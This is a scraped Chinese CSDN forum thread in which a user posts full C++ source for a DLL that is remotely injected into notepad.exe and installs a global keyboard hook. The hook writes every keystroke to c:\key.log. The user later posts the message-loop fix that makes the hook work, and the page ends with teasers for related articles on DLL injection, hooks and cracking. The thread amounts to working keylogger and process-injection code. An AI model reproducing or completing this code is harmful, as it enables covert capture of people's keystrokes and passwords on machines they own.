一个写在dll里面的钩子的问题。

VC/MFC > 进程/线程/DLL
收藏 回复
[问题点数:30分,结帖人xcw_pet]
更多帖子
私信 空间 博客
xcw_pet
等级
本版专家分:0
结帖率 94.44%
我运用远程注入的方法,假设在进程 “notepad.exe”中注入 一个dll。
我在dll 是用win32 写的。 功能是: 挂了一个钩子,可以捕获键盘信息,然后把信息写入一个文件夹中!
问题来了:  我现在是能注入到这个进程之中, 360防护也提示有钩子安装,但是我允许安装钩子之后,然后就没反应了!
                       好像都没有进入到钩子的回调函数, 我在回调函数里面放了一个Messagebox 都没有效果。 这到底是为什么?
                       我这个钩子是能用的,我是从其他的程序上面差不多移植过来的。  求做过的朋友指导一下!
                       程序和系统都是x64。
代码如下如下:
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
     MessageBox( NULL, ("DLL已进入目标进程。"), ("信息"), MB_ICONINFORMATION ); 
 start();
   }

break;
case DLL_PROCESS_DETACH:


stop();
    MessageBox( NULL, ("DLL已从目标进程卸载。"), ("信息"), MB_ICONINFORMATION );
}
break;
case DLL_THREAD_ATTACH:

break;
case DLL_THREAD_DETACH:

 break;
}
return TRUE;
}

#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; //keyboar hook
HINSTANCE glhInstance=NULL; //globle instance
HWND hOutPutWnd=NULL;  //Display Pass Wnd
#pragma data_seg()

void SaveLog(char*c)
{
//name.Format(_T("c:\\Key_%d_%d.log"),tm.GetMonth(),tm.GetDay());
FILE *file;
file=fopen("c:\\key.log","ab+");


if(file==NULL)
{
printf("错误!");

        exit(1); //中止程序
}
//file.SeekToEnd();
fseek(file,0,SEEK_END);
//file.Write(c,1);
fwrite(c,1,1,file);
     fclose(file);
}
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{       



LRESULT Result=CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);


MessageBox(  NULL,"我现在在回调函数中",("信息"), MB_ICONINFORMATION); 

if(nCode==HC_ACTION)  
{  

if((lParam&0xc000ffff)==1) //keydown事件发生时  
{           
/*char key[20];  
GetKeyNameText(lParam,key,20);*/
char *sName="";


BOOL b_sft=::GetAsyncKeyState (VK_SHIFT)>>((sizeof(short)*8)-1);

if(b_sft)

{

switch(wParam)

{

case '1':sName="!"; break;

case '2':sName="@"; break;

case '3':sName = "#";break;

case '4':sName = "$";break;

case '5':sName = "%";break;

case '6':sName = "^";break;

case '7':sName = "&";break;

case '8':sName = "*";break;

case '9':sName = "(";break;

case '0':sName = ")";break;

case 'A':sName = "A";break;

case 'B':sName = "B";break;

case 'C':sName = "C";break;

case 'D':sName = "D";break;

case 'E':sName = "E";break;

case 'F':sName = "F";break;

case 'G':sName = "G";break;

case 'H':sName = "H";break;

case 'I':sName = "I";break;

case 'J':sName = "J";break;

case 'K':sName = "K";break;

case 'L':sName = "L";break;

case 'M':sName = "M";break;

case 'N':sName = "N";break;

case 'O':sName = "O";break;

case 'P':sName = "P";break;

case 'Q':sName = "Q";break;

case 'R':sName = "R";break;

case 'S':sName = "S";break;

case 'T':sName = "T";break;

case 'U':sName = "U";break;

case 'V':sName = "V";break;

case 'W':sName = "W";break;

case 'X':sName = "X";break;

case 'Y':sName = "Y";break;

case 'Z':sName = "Z";break;


//case '`':sName ="~";break;

}

}

else

{

switch(wParam)

{

/*0~9*/

case '1': sName="1"; break;

case '2':sName = "2";break;

case '3':sName = "3";break;

case '4':sName = "4";break;

case '5':sName = "5";break;

case '6':sName = "6";break;

case '7':sName = "7";break;

case '8':sName = "8";break;

case '9':sName = "9";break;

case '0':sName = "0";break;

/*A~Z*/

case 'A':sName = "a";break;

case 'B':sName = "b";break;

case 'C':sName = "c";break;

case 'D':sName = "d";break;

case 'E':sName = "e";break;

case 'F':sName = "f";break;

case 'G':sName = "g";break;

case 'H':sName = "h";break;

case 'I':sName = "i";break;

case 'J':sName = "j";break;

case 'K':sName = "k";break;

case 'L':sName = "l";break;

case 'M':sName = "m";break;

case 'N':sName = "n";break;

case 'O':sName = "o";break;

case 'P':sName = "p";break;

case 'Q':sName = "q";break;

case 'R':sName = "r";break;

case 'S':sName = "s";break;

case 'T':sName = "t";break;

case 'U':sName = "u";break;

case 'V':sName = "v";break;

case 'W':sName = "w";break;

case 'X':sName = "x";break;

case 'Y':sName = "y";break;

case 'Z':sName = "z";break;

}

}

switch(wParam) //数字键

{

case VK_BACK:sName="~"; break;

case VK_NUMPAD1:sName="1";break;

case VK_NUMPAD3:sName = "3";break;

case VK_NUMPAD4:sName = "4";break;

case VK_NUMPAD5:sName = "5";break;

case VK_NUMPAD6:sName = "6";break;

case VK_NUMPAD7:sName = "7";break;

case VK_NUMPAD8:sName = "8";break;

case VK_NUMPAD9:sName = "9";break;

case VK_NUMPAD0:sName = "0";break;

case VK_MULTIPLY:sName = "*";break;


case VK_ADD: sName="+";break;

case VK_SUBTRACT: sName="-"; break;

case VK_DECIMAL: sName="."; break;

case VK_DIVIDE: sName="/";  break;

}
SaveLog(sName);
}  

return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
}


void stop()
{
UnhookWindowsHookEx(hKeyBoardHook);
}
void start()
{
      
hKeyBoardHook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook
,::GetModuleHandleA("DLLHOOK.dll"),0/*::GetCurrentThreadId()*/);



if(hKeyBoardHook==NULL)
{
MessageBox( NULL, ("钩子安装失败。"), ("信息"), MB_ICONINFORMATION );

}
else
{
MessageBox( NULL, ("钩子安装成功。"), ("信息"), MB_ICONINFORMATION );
}
}
只看楼主 引用 举报 楼主 收起
展开阅读全文
更多帖子
私信 空间 博客
xcw_pet
等级
本版专家分:0
会不会是全局钩子不行的?   先试一下注入自己本进程,获得自己进程的id。
只看TA 引用 举报 #1得分 0
更多帖子
私信 空间 博客
xcw_pet
等级
本版专家分:0
哪位朋友做过哟?
只看TA 引用 举报 #2得分 0
更多帖子
私信 空间 博客
赵4老师
等级
本版专家分:87823
勋章
Blank
状元 2017年 总版技术专家分年内排行榜第一
Blank
榜眼 2014年 总版技术专家分年内排行榜第二
Blank
探花 2013年 总版技术专家分年内排行榜第三
Blank
进士 2018年总版新获得的技术专家分排名前十
2012年 总版技术专家分年内排行榜第七
WinAPIOverridehttp://jacquelin.potier.free.fr/winapioverride32/
只看TA 引用 举报 #3得分 30
更多帖子
私信 空间 博客
xcw_pet
等级
本版专家分:0
历时一周,一直翻CSDN,终于找到答案。这是一个老问题了,所以大家可能都忽略了。   
解决的问题的办法是:在setwindowhookex的后面  添加


C/C++ code

?
1
2
3
4
5
6
MSG msg;
while(GetMessage(&msg, NULL, 0, 0))
{
    TranslateMessage(&msg);
    DispatchMessage(&msg);
}

而且,最好在case DLL_PROCESS_ATTACH:后面创建一个新的线程,然后在该线程中SetWindowsHookEx...

感谢这个博主:http://bbs.csdn.net/topics/200008603 提出的问题。
只看TA 引用 举报 #4得分 0
收起
收藏 回复
xcw_pet

等级:

关注 私信 TA的帖子
全局钩子 实例(不使用DLL和使用DLL两种)

出处:CSDN 作者: xstring  不知道大家是通过什么开始对钩子(Hook)有了解的,我是看过Jeffrey Richter的《WINDOWS 高级编程指南》(新版的中文...这本书里作者介绍了三种将代码注入其他进程的方法,其中

接触DLL编写并实现线程注入和全局钩子

有空发给你,一些 自己珍藏的书籍 还有你应有VC++6.0和MSDN 好了,开始吧 目录 0一点建议 1DLL基本知识 2编写我们的DLL 3编写加载我们DLL的Loader,实现一个类似RUNDLL32.EXE的程序 4线程注入之Loader编写 5...

自己写一个键盘钩子程序来监视键盘输入

钩子是Windows的消息监视点,应用程序可以这里安装一个监视子程序,这样就可以系统中的消息流到达目的窗口过程前监控它们“ 上面就是WIN32API手册中对钩子的描述。大概就是说钩子可以用来截获系统的消息。...

DLL注入技术之消息钩子注入(HOOK简单的实现)

Hook,是Windows消息处理机制的一个平台,应用程序可以上面设置子程序以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,目标窗口处理函数之前处理它。钩子机制允许应用程序...

全局钩子为什么要用DLL 共享节

关于全局钩子为什么一定要在DLL中 2013-12-05 13:02使徒辟允382 分类:网站使用 | 浏览 66 次 我有更好的答案 分享到: 举报| 2013-12-05 14:03 提问者采纳 如果你...

VC dll 注入之钩子注入

 C++只是菜鸟,最近学习了下DLL注入,是通过hook方式来注入的。... 首先得需要几函数:  HHOOK SetWindowsHookEx(   int idHook, //要安装的钩子类型 (参考下面的IdHook取值)  

DLL的基础知识和第一个DLL程序

该文章讲述了dll的基本知识、dll的工程建立和使用dll两种方式实现应用程序...Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行...

通过写dll方式注入全局键盘钩子,截获输入法语音识别内容(新手贴)

最初的想法是窗体上新建一个文本框,输入后再根据文本框的属性去获取,之后发现存在很多问题,比如光标移动了、程序不最上层、被小化等不确定因素太多;故了解到全局钩子后,即着手进行。二、实现 刚开始对...

DLL初步和钩子入门

首先来静态链接库的。 //文件:lib.h #ifndef LIB_H #define LIB_H extern "C" int add(int x,int y); //声明为C编译、连接方式的外部函数 #endif //文件:lib.cpp #include "lib.h" int add(int x,int y...

JAVA上百实例源码以及开源项目源代码

数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录 一个Java+ajax的...

Dll注入:Windows消息钩子注入

SetWindowsHook()是Windows消息处理机制的一个平台,应用程序可以上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,目标窗口处理函数之前处理它。 钩子机制允许...

破解DLL的一点心得体会

####破解入门#### 常见的修改方法有两种,我给你举例说明: 示例 1------注册代码: 00451239 CALL 00405E02 (关键CALL,用来判断用户输入的注册码...0045123D JZ 004572E6 (!!! 0045XXXX YYYYYYYYYY XXXXXXXX YYYY

低级键盘钩子(免DLL注入)dota改键源码+总结(MFC)

基于低级键盘钩子(全局监控+免DLL注入),里面有源码+总结。。

python hook dll_Python——dll注入

dll攻击原理分析什么是dll动态...为何有dll由于进程的地址空间是独立的(保护模式),当多进程共享相同的库时,每库都硬盘和进程彼此的内存存放份的话,对于早期的计算机来说,无疑是种极大的浪费,于是win...

波哥钩子教程

日常生活中,我们的钩子是用来钩住某种东西的,比如,说,鱼钩是用来钓鱼的,一旦鱼咬了钩,钩子就一直钩住鱼了,任凭鱼水里怎么游,也逃不出鱼钩的控制。同样的,Windows的钩子Hook也是用来钩东西的,比较抽象的...

【MisakaHookFinder使用方法】关于如何提取一个文字游戏的文本钩子以供翻译的方法

前言

练习 进程钩子 全局钩子

C++ 关于钩子的知识点博客网上基本的都非常...比如我们只想起一个MFC程序,截获这个MFC程序界面中的所有鼠标,键盘操作。这属于进程中的钩子。 编写普通的进程中的钩子demo,可以直接建立一个小MFC工程就可以了。

VC++截取输入法输入信息钩子dll实现

VC++截取输入法输入信息钩子dll实现

钩子编程(HOOK) 安装系统全局钩子 (3)

[钩子编程(HOOK) 安装系统全局钩子]全局钩子,钩子一词多用于计算机编程中,英文叫hook,指利用api来提前拦截并处理windows消息的一种技术。如键盘钩子,许多木马都有这东西,监视你的键盘操作。全局钩子是系统钩子...

全局键盘钩子函数的回调函数有时无效

``` DLL代码: myHooke.c #include "myHooke.h" ... //定义钩子句柄 ... case DLL_PROCESS_ATTACH: ... case DLL_THREAD_...我想实现的功能是:无论哪里,只要键盘按下,我的程序就会有响应 打印按键被按下的消息

设置了全局钩子,但是发现有的程序钩不到,这个问题可能的一个原因

问题:  使用SetWindowsHookEx设置了

钩子

hook函数教程(一)什么是钩子一、什么是钩子 我们可以首先从字面上了解钩子,钩子是干什么的呢?日常生活中,我们的钩子是用来钩住某种东西的,比如,说,鱼钩是用来钓鱼的,一旦鱼咬了钩,钩子就一直钩住鱼了,...

QT 调用 DLL 的三种方法

Qt调用DLL方法:使用Win32 API h文件 typedef bool (CALLBACK* SetKeyBoardHook)(HWND); HINSTANCE hDLL; // Handle to DLL SetKeyBoardHook lpfnDllFunc1; // Function pointer cpp文件 ...

14种DLL注入技术

本文只是介绍各个注入的核心思想,详细的可以参照文末链接里的源码,一看就明白。本文只是介绍各个注入的...DLL注入是指向某一个特定的进程空间强制插入一个特定的DLL文件映像,值得注意的是这种插入是强制性的插...

[VB+C-DLL]全局钩子

程序编写期间也遇到了点问题,例如做WH_FOREGROUNDIDLE钩子的时候发现dwThreadId参数设为0和设为GetCurrentThreadId均不能成功加载DLL,还望路过并看到此文的大侠能指点二~~~源码下载地址:...

vb.net的键盘鼠标全局,线程钩子

vb.net下的键盘、鼠标、窗体全局、线程钩子类库源码,可以C#以及vb.net中调用。 里面有测试调用程序源码

微信小程序源码-合集1.rar

【微信小程序-源码合集】该合集主要整理 包含交友互动、节日祝福、金融行业、旅游行业、论坛系列、美容行业!

敏捷开发V1.0.pptx

敏捷开发PPT 敏捷开发以用户的需求进化为核心,采用迭代、循序渐进的方法进行软件开发。在敏捷开发中,软件项目在构建初期被切分成多个子项目,各个子项目的成果都经过测试,具备可视、可集成和可运行使用的特征。换言之,就是把一个大项目分为多个相互联系,但也可独立运行的小项目,并分别完成,在此过程中软件一直处于可使用状态。

Java基础核心技术:多线程(day16-day17)

本套Java视频完全针对初级学员,课堂实录,自发布以来,好评如潮!Java视频中注重与学生互动,讲授幽默诙谐、细致入微,覆盖Java基础所有核心知识点,同类Java视频中也是代码量大、案例多、实战性强的。同时,本Java视频教程注重技术原理剖析,深入JDK源码,辅以代码实战贯穿始终,用实践驱动理论,并辅以必要的代码练习。 通过20的课程学习,使学员掌握java核心语法、面向对象思想编程、异常处理、IO流、集合类、多线程、网络编程等。

Python-TCP

带你学习TCP控制以及通信 学习网络的概念以及含义

相关热词 c#dll vb 调用 c# outlook c#修改表数据 c# 子窗体值返给父窗体 c# label 格式化 c# 程序如何控制摄像头 c# 获取运行时间 c#知识点结构图 微软c# c#解析owl